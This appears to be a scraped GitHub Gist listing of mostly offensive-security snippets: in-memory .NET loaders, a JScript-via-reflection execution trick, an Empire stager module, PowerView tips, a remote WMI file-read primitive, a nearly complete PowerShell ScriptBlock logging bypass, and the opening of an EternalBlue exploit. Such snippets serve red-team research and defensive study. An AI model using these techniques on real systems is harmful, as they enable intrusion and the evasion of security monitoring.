Skip to content

Instantly share code, notes, and snippets.


2XXE GeneralTesler

View GitHub Profile
xpn / clr_via_native.c
Created Apr 11, 2018
A quick example showing loading CLR via native code
View clr_via_native.c
#include "stdafx.h"
int main()
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
mattifestation / LoadInMemoryModule.ps1
Created Mar 30, 2018
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
View LoadInMemoryModule.ps1
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
enricofoltran / main.go
Last active Jan 26, 2022
A simple golang web server with basic logging, tracing, health check, graceful shutdown and zero dependencies
View main.go
package main
import (
gabemarshall / jscript.ps1
Created Jan 3, 2018
Executing JScript from Powershell via .NET reflection
View jscript.ps1
$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'
curi0usJack / .htaccess
Last active Jan 18, 2022
View .htaccess
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
# Note this version requires Apache 2.4+
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
# Include /etc/apache2/redirect.rules
mattifestation / FileReadPrimitive.ps1
Last active Jun 18, 2020
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
View FileReadPrimitive.ps1
$CimSession = New-CimSession -ComputerName
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
infosecn1nja /
Created Jul 21, 2017
Empire stagers module to generates a .js launcher.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]): = {
'Name': 'JS Launcher StarFighter',
'Author': ['Cn33liz'],
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Jan 27, 2022
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
cobbr / ScriptBlockLogBypass.ps1
Last active Sep 19, 2021
ScriptBlock Logging Bypass
View ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
worawit /
Last active Oct 3, 2021
Eternalblue exploit for Windows 8/2012
# This file has no update anymore. Please see
from impacket import smb, ntlm
from struct import pack
import sys
import socket
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)